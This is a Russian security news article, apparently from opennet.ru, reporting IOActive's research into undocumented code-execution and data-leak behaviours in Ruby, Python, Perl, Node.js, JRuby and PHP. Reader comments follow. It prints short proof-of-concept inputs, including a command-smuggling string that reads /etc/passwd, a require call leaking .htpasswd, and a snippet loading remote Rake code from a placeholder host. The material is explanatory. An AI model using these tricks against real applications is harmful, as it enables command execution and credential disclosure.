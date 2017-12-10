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10.12.2017 00:07  Неявные свойства языков программирования, которые могут привести к уязвимостям

Исследователи из компании IOActive представили на конференции Black Hat Europe доклад, в котором подвели итоги работы по выявлению недокументированной функциональности в интерпретируемых языках программирования, которая может потенциально стать причиной появления уязвимостей в приложениях. Код разработанного в рамках исследования инструментария ZDiFF (Extended Differential Fuzzing Framework), который применялся для выявления потенциальных уязвимостей, опубликован под лицензией GPLv3.

Примером подобной функциональности, который подтолкнул к проведению исследования, является давно известная особенность открытия ссылок через функцию open() в языке Ruby. При передаче URL в качестве аргумента, данная функция позволяет загрузить удалённую страницу, чем пользуются многие разработчики. При этом не все учитывают, что при отсутствии надлежащей проверки (например, при проверке входных значений через "/^https:/"), вместо URL может быть передана конструкция вида "|head /etc/passwd;\nhttps://url.com", которая приведёт к выполнению кода "head /etc/passwd" в системе.

Проведя fuzzing-тестирование стандартных наборов библиотек популярных языков программирования была выявлена серия недокументированных особенностей в Python, Perl, Node.js, JRuby и PHP, которые сами по себе не являются уязвимостями, но могут стать источником их появления в приложениях:

  • Недокументированный способ выполнения кода в Python, используя метод pipeto() в библиотеке mimetool, метод pipepager в библиотеке pydoc или манипулируя переменной окружения PAGER при выполнении метода pager в pydoc. Например, для выполнения программы id можно использовать 
    
   import mimetools 
   print(mimetools.pipeto(None,'id'))

   или
   import pydoc
   print(pydoc.pipepager(None,'id')

   или
   $ export PAGER="id> bar"
   $ python -c "import pydoc;pydoc.pager('foo')"
  • Локальное выполнение кода в программах на языке Perl, использующих функцию embeddable_typemap() из модуля "ExtUtils::Typemaps::Cmd" для загрузки XS typemap, которая имеет неприятную особенность исполнения аргумента как Perl-кода в случае ошибки. Для выполнения программы id можно использовать код (параметр функции embeddable_typemap будет выполнен через eval и результат показан в составе сообщения об ошибке): 
    
   use ExtUtils::Typemaps::Cmd;
   print embeddable_typemap("system 'id'");
  • Утечка данных из файла в составе сообщения об ошибке в Node.JS. При возможности контролировать имена модулей, загружаемых через вызов require(), в случае попытки загрузки не JavaScript-файла буде сгенерирован SyntaxError, но при использовании JavaScript-движка V8 в составе текста ошибки будет выдано содержимое первой строки файла. Например, попытка выполнить "console.log(require('.htpasswd'))" приведёт к выводу содержимого первой строки файла ".htpasswd" в тексте ошибки.
  • Возможность выполнения кода в программах JRuby, использующих класс Rake. Напрмер, для выполнения команды id можно разместить на внешнем сайте файл http://x.x.x.x/canaryfile с содержимым "пустая строка puts %x(id)" и инициировать обработку ссылки http://x.x.x.x/canaryfile в функции load_rakefile: 
    
   require "rake";
   puts Rake.load_rakefile("http://x.x.x.x/canaryfile");
  • Выполнение команд в коде на PHP, использующем неопределённые константы, которые интерпретируются как строки. В случае если константы определяются в одном файле, а использующие их вызов в другом, можно напрямую обратиться ко второму файлу и вместо содержимого константы значение будет обработано как строковое имя константы. Например: 
    
   echo shell_exec(escapeshellcmd(bash." -c id"));
    приведёт к выполнению "bash -c id", хотя по задумке разработчиков в константе bash могли передаваться другие данные.

  1. Главная ссылка к новости (https://www.reddit.com/r/netse...)
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: perl, php, ruby, python
При перепечатке указание ссылки на opennet.ru обязательно
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  • 1.1, Аноним, 00:33, 10/12/2017 [ответить] [смотреть все]    [к модератору]
    		• –2 +/
    дырявое php как всегда
     
     
  • 2.2, Аноним, 00:36, 10/12/2017 [^] [ответить] [смотреть все]    [к модератору]
    		• +3 +/
    Справедливости ради отметим, что не только PHP.
     
  • 2.3, Аноним, 00:38, 10/12/2017 [^] [ответить] [смотреть все]    [к модератору]
    		• +1 +/
    Как видишь и его конкуренты такие же.
     
  • 2.6, vitalif, 01:11, 10/12/2017 [^] [ответить] [смотреть все]    [к модератору]
    		• +/
    это с пхп как раз вообще за уши притянуто)

    там гораздо прикольнее вещи есть... правда многие уже не есть а БЫЛИ - в прошлом времени - их исправляют планомерно - всякие там register_globals, magic_quotes_gpc, zend_assertions и т.д и т.п

     
  • 1.4, Аноним, 01:00, 10/12/2017 [ответить] [смотреть все]     [к модератору]
    		• +/
    Все нормальные хостеры давно запретили вызов консольных команд из скрипта РНР ... весь текст скрыт [показать]
     
     
  • 2.7, нах, 01:20, 10/12/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    список этих "нормальных" дятлов озвучьте, плиз. Он не должен быть большим.

    чтоб не долго гадать, почему восстановление пароля, к примеру, не работает.

     
  • 1.5, web1.0, 01:02, 10/12/2017 [ответить] [смотреть все]    [к модератору]  
    		• +/
    > вместо URL может быть передана конструкция вида "|head /etc/passwd;\nhttps://url.com", которая приведёт к выполнению кода "head /etc/passwd" в системе

    Упоротое наследие Perl?

     
     
  • 2.8, Аноним, 01:36, 10/12/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    А при чём тут Perl? Открывать через open URL придумали в PHP.
     

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